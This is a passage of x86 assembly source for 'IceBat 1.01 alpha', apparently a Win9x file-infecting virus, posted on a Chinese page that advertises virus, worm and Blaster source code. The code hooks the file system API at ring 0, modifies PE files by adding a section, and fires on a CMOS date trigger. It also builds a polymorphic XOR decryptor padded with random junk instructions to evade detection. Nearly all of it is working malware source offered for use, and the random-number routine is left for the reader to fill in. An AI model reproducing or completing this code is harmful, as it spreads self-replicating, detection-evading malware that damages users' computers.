codes的icebat(1.01 alpha)原代码 ——win9x virus.txt

病毒源码 包括世上第一个病毒源码、蠕虫源码、冲击波源码

LEA ESI,EBP[VIR_ENCRY_START-MYHOOKAPI] 
CALL EDI 
; Change Dos Sub Header Message! 
CALL CHECKTRIGGER 
OR EAX,EAX 
JZ CLOSEFILE 

MOV EAX,R0_WRITEFILE 
XOR ECX,ECX 
INC ECX 
INC ECX 
INC ECX 
INC ECX 
LEA ESI,EBP[PESTART-MYHOOKAPI] 
MOV DWORD PTR [ESI],20202020H 
MOV EDX,04EH 
CALL EDI 

CALL NOTMSG 

MOV EAX,R0_WRITEFILE 
MOV ECX,14 
LEA ESI,EBP[MSG-MYHOOKAPI] 
MOV EDX,04EH+04H 
CALL EDI 

CALL NOTMSG 

CLOSEFILE: 
MOV EAX,R0_CLOSEFILE  ; 关档 
CALL EDI 
RETURN_ATTRIB: 
MOV EAX,DR3   ; 恢复文件属性 
MOV ECX,EAX 
MOV AX,R0_FILEATTRIBUTES+1 
LEA ESI,EBP[BUF-MYHOOKAPI] 
CALL EDI 
EXIT_INFECT:  

CANCELACTION: 
MOV BYTE PTR EBP[MYFLAG-MYHOOKAPI],0 ; 设置忙位为零 
MOV EAX,EBP[OLDHOOKAPI-MYHOOKAPI] ; 得到旧的 FILESYSTEMAPIHOOK 入口 
MOV DR1,EAX    ; 暂存到 DR1 
POPAD     ; 全局出栈 
MOV EAX,DR1    ; 将 DR1 ( 旧的 FILESYSTEMAPIHOOK ) 返回 EAX 
JMP [EAX]    ; 跳到 OLD FILESYSTEMAPIHOOK 
;================================ 
; SOME USEFUL FUNCTIONS 
;================================ 
FILEOP:      ; 文件操作函数 
INT 20H 
DD 00400032H    ; IFSMgr_Ring0_FileIO 
RET 
;=============================================== 
NOTMSG: 
PUSHAD 
LEA ESI,EBP[MSG-MYHOOKAPI] 
MOV EDI,ESI 
XOR ECX,ECX 
CLD 
LOOPNOT: 
LODSB 
NOT AL 
STOSB 
INC ECX 
CMP ECX,14 
JNZ LOOPNOT 
POPAD 
RET 
;=============================================== 
CHECKTRIGGER:   ; 是发作日则返回 1 , 否则返回零 
MOV AL,07H  ; 得到今天的日期 
OUT 70H,AL 
IN AL,71H 
CMP AL,TRIGGERDAY ; AL - 今天的日期 
JNZ EXIT_TRIGGER 
MOV AL,08H  ; 得到今天的月份 
OUT 70H,AL 
IN AL,71H 
CMP AL,TRIGGERMON ; AL - 今天的月份 
JNZ EXIT_TRIGGER 
XOR EAX,EAX 
INC EAX 
RET 
;================================ 
; END OF TRIGGER 
;================================ 
EXIT_TRIGGER: 
XOR EAX,EAX 
RET 
;================================ 
ENCRYATION_MYSELF: 
PUSHAD 
MOV EDI,EBP[VIR_CODE_START-MYHOOKAPI] 
LEA ESI,EBP[VIRSTART-MYHOOKAPI] 
MOV ECX,OFFSET VIRSIZE-VIRSTART 
ENCRY_NEXT_BYTE: 
LODSB 
XOR AL,BYTE PTR EBP[XOR_CODE-MYHOOKAPI] 
STOSB 
DEC ECX 
OR ECX,ECX 
JNZ ENCRY_NEXT_BYTE 
POPAD 
RET 
;================================ 
; ENCRYATION VIRUS 
; 入口参数: 
; ECX - INFECT FILE RVA 
;================================ 
ENCRYATION_VIR: 
CLD 
CALL RND 
OR AL,AL 
JNZ RND_NUM_OK 
DEC AL 
RND_NUM_OK: 
MOV BYTE PTR EBP[XOR_CODE-MYHOOKAPI],AL 
LEA EDI,EBP[VIR_ENCRY_START-MYHOOKAPI] 
CALL RND 
AND AL,01H 
OR AL,AL 
JZ SET_ESI 
MOV BYTE PTR EBP[USE_REG-MYHOOKAPI],AL ; USE EDI 
JMP NEXT1 
SET_ESI: 
MOV BYTE PTR EBP[USE_REG-MYHOOKAPI],AL ; USE ESI 
NEXT1: 
CALL MADE_SPAN_FLAG 
CALL MADE_SPAN_FLAG 
CALL MADE_SPAN 
CMP BYTE PTR EBP[USE_REG-MYHOOKAPI],0 
JZ INIT_ESI 
MOV AX,0FF33H 
STOSW 
JMP NEXT2 
INIT_ESI: 
MOV AX,0F633H 
STOSW 
NEXT2: 
CALL MADE_SPAN_FLAG 
CALL MADE_SPAN 
MOV DWORD PTR EBP[JUMP_BEGIN-MYHOOKAPI],EDI 
CALL MADE_SPAN_FLAG 
CALL MADE_SPAN 
CALL MADE_SPAN_FLAG 
;CALL MADE_DISCRYATION_CODE 
MOV AL,80H 
STOSB 
MOV AL,0B6H 
ADD AL,BYTE PTR EBP[USE_REG-MYHOOKAPI] 
STOSB 
MOV DWORD PTR EBP[USED_OFFSET-MYHOOKAPI],EDI ; CHANGE IT LATER 
STOSD 
MOV AL,BYTE PTR EBP[XOR_CODE-MYHOOKAPI] 
STOSB 
CALL MADE_SPAN_FLAG 
CALL MADE_SPAN 
;CALL INC ESI OR EDI 
MOV AL,046H 
ADD AL,BYTE PTR EBP[USE_REG-MYHOOKAPI] 
STOSB 
NEXT3: 
CALL MADE_SPAN 
CALL MADE_SPAN_FLAG 
;CALL MADE_LOOP 
MOV AL,081H 
STOSB 
MOV AL,0FEH 
ADD AL,BYTE PTR EBP[USE_REG-MYHOOKAPI] 
STOSB 
MOV EAX,OFFSET VIRSIZE-VIRSTART 
STOSD 
MOV EBX,DWORD PTR EBP[JUMP_BEGIN-MYHOOKAPI] 
SUB EBX,EDI 
MOV AX,850FH 
STOSW 
MOV EAX,EBX 
STOSD 
MOV EBP[VIR_CODE_START-MYHOOKAPI],EDI 
LEA ESI,EBP[VIR_ENCRY_START-MYHOOKAPI] 
SUB EDI,ESI 
MOV DWORD PTR EBP[VIR_ENCRY_LENGTH-MYHOOKAPI],OFFSET VIRSIZE-VIRSTART 
ADD EBP[VIR_ENCRY_LENGTH-MYHOOKAPI],EDI 
ADD ECX,EDI 
MOV EDI,EBP[USED_OFFSET-MYHOOKAPI] 
MOV [EDI],ECX 
RET 
;=================================== 
; GET RND NUMBER => AX 
;=================================== 
RND: 
; 自己加把 
RET 
;=====[ MADE SPAN FLAG ITEM ]======= 
MADE_SPAN_FLAG_ITEM: 
CALL RND 
AND AL,04H 
OR AL,AL 
JZ MSF_GROUP1 
CMP AL,01 
JZ MSF_GROUP2 
CMP AL,02 
JZ MSF_GROUP3 
CMP AL,03 
JZ MSF_GROUP4 
RET 
MSF_GROUP1: 
MOV AL,81H 
STOSB 
CALL RND 
AND AL,03H 
OR AL,AL 
JNZ GROUP11 
MOV BL,0E9H ;SUB 
JMP G11_CON 
GROUP11: 
CMP AL,01 
JNZ GROUP12 
MOV BL,0C1H ; ADD 
JMP G11_CON 
GROUP12: 
CMP AL,02 
JNZ GROUP13 
MOV BL,0D1H ; ADC 
JMP G11_CON 
GROUP13: 
MOV BL,0D9H ; SBB 
G11_CON: 
CALL RND 
AND AL,02H 
ADD AL,BL 
STOSB 
CALL RND 
SHL EAX,10H 
CALL RND 
STOSD 
RET 
MSF_GROUP2: 
CALL RND 
AND AL,02H 
OR AL,AL 
JZ G21 
CMP AL,01 
JZ G22 
MOV AL,0F7H ; NEG EAX/EBX/ECX/EDX 
STOSB 
CALL RND 
AND AL,03H 
ADD AL,0D8H 
STOSB 
RET 
G21: 
CALL RND ; INC EAX/EBX/ECX/EDX 
AND AL,03H 
ADD AL,040H 
STOSB 
RET 
G22: 
CALL RND ; DEC EAX/EBX/ECX/EDX 
AND AL,03H 
ADD AL,48H 
STOSB 
RET 
MSF_GROUP3: 
CALL RND 
AND AL,05H 
OR AL,AL 
JNZ G31 
MOV AL,027H ; DAA 
STOSB 
RET 
G31: 
CMP AL,01 
JNZ G32 
MOV AL,02FH ; DAS 
STOSB 
RET 
G32: 
CMP AL,02 
JNZ G33 
MOV AL,037H ; AAA 
STOSB 
RET 
G33: 
CMP AL,03 
JNZ G34 
MOV AL,03FH ; AAS 
STOSB 
RET 
G34: 
CMP AL,04 
JNZ G35 
MOV AX,0AD4H ; AAM 
STOSW 
RET 
G35: 
MOV AX,0AD5H ; AAD 
STOSW 
RET 
MSF_GROUP4: 
MOV AL,081H ; XOR EBX/ECX/EDX,???????? 
STOSB 
CALL RND 
AND AL,02H 
ADD AL,0F1H 
STOSB 
CALL RND 
SHL EAX,10H 
CALL RND 
STOSD 
RET 
;=================================== 
; MADE CODE DO NOT 
; MODIFY FLAGS ( 0-4 OPS ) 
;=================================== 
MADE_SPAN: 
CALL MADE_SPAN_ITEM 
CALL MADE_SPAN_ITEM 
CALL MADE_SPAN_ITEM 
CALL MADE_SPAN_ITEM 
RET 
;=================================== 
MADE_SPAN_ITEM: 
CALL RND 
AND AL,05H 
OR AL,AL 
JZ MS_MADE_MOV 
CMP AL,01 
JZ MS_MADE_XCHG 
CMP AL,02 
JZ MS_MADE_IN 
CMP AL,03 
JZ MS_MADE_MOV 
CMP AL,04 
JZ MS_MADE_NOT 
CMP AL,05 
JZ MS_MADE_CCN 
RET 
MS_MADE_CCN: 
CALL RND 
AND AL,02 
OR AL,AL 
JNZ CCN1 
MOV AX,9866H  ; CBW 
STOSW 
RET 
CCN1: 
CMP AL,01 
JNZ CCN2 
MOV AX,9966H  ; CWD 
STOSW 
RET 
CCN2: 
MOV AL,90H  ; NOP 
STOSB 
RET 
MS_MADE_MOV: 
CALL MADE_MOV_ITEM 
RET 
MS_MADE_XCHG: 
CALL RND  ; XCHG EAX,EBX/ECX/EDX 
AND AL,02H 
ADD AL,91H 
STOSB 
RET 
MS_MADE_IN: 
MOV AL,0E4H  ; IN AL,?? 
STOSB 
CALL RND 
STOSB 
RET 
MS_MADE_NOT: 
MOV AL,0F7H  ; NOT EAX/EBX/ECX/EDX 
STOSB 
CALL RND 
AND AL,03 
ADD AL,0D0H 
STOSB 
RET 
;===========[ MADE CODE MOV ]============ 
MADE_MOV_ITEM: 
CALL RND  
AND AL,02H 
OR AL,AL 
JNZ MOV1 
CALL RND  ; MOV EAX/EBX/ECX/EDX, ???????? 
AND AL,03H 
ADD AL,0B8H 
STOSB 
CALL RND 
SHL EAX,10H 
CALL RND 
STOSD 
RET 
MOV1: 
CMP AL,01 
JNZ MOV2 
MOV AL,066H  ; MOV AX/BX/CX/DX,???? 
STOSB 
CALL RND 
AND AL,03H 
ADD AL,0B8H 
STOSB 
CALL RND 
STOSW 
RET 
MOV2: 
CALL RND  ; MOV AH/AL/BH/BL/CH/CL/DH/DL,?? 
AND AL,07H 
ADD AL,0B0H 
STOSB 
CALL RND 
STOSB 
RET 
;******************************** 
;* STATIC AND DYNANIC DATAS * 
;******************************** 
MSG  DB NOT('I'),NOT('C'),NOT('e'),NOT('B'),NOT('a'),NOT('T'),NOT(' '),NOT('1'),NOT('.'),NOT('0'),NOT(','),NOT('T'),NOT('j'),NOT('$') 
OLDHOOKAPI DD 0   ; 旧的 api hook 地址 
MYFLAG  DB 0   ; 忙位 
VIRSIZE  = $ 
;=========[ NEW SECTION ]========== 
NEWOBJ:      ; 新建的 object section 
ONAME  DD 0 
   DD 0 
VIRTUALSIZE DD 0 
RVA  DD 0 
PHYSICALSIZE DD 0 
PHYSICALOFFSET DD 0 
REVERSED DD 0,0,0 
OBJFLAGS DD 0 
;=========[ MEMORY BUFFER ]==========  
BUF  DB 0FFH DUP(0)  ; 文件名及其路径缓冲区 
PESTART  DD 0   ; pe start offset 
OBJTABOFFSET DD 0   ; object table offset 
PEHEADER:     ; peheader buffer 
PESIGN  DD 0 
CPUTYPE  DW 0 
NUMOBJ  DW 0 
   DB 3*4 DUP(0) 
NTHEADERSIZE DW 0 
FLAGS  DW 0 
   DB 4*4 DUP(0) 
ENTRYPOINTRVA DD 0 
   DB 2*4 DUP(0) 
IMAGEBASE DD 0 
OBJALIGN DD 0 
FILEALIGN DD 0 
   DB 4*4 DUP(0) 
IMAGESIZE DD 0 
HEADERSIZE DD 0 
OTHERBUF  DB 500H DUP(0) 
;=======[ USE FOR ENCRYATION ]======= 
RND_SEED  DB 0 
XOR_CODE  DB 0 
USE_REG   DB 0 
VIR_CODE_START  DD 0 
USED_OFFSET  DD 0 
JUMP_BEGIN  DD 0 
VIR_ENCRY_LENGTH DD 0 
VIR_ENCRY_START  DB 1000H DUP(0) 
;******************************** 
;* END OF MY CUTE VIRUS DATAS * 
;******************************** 
VIRMEMORYSIZE = $ 
VIRSEG ENDS 
END VIRSTART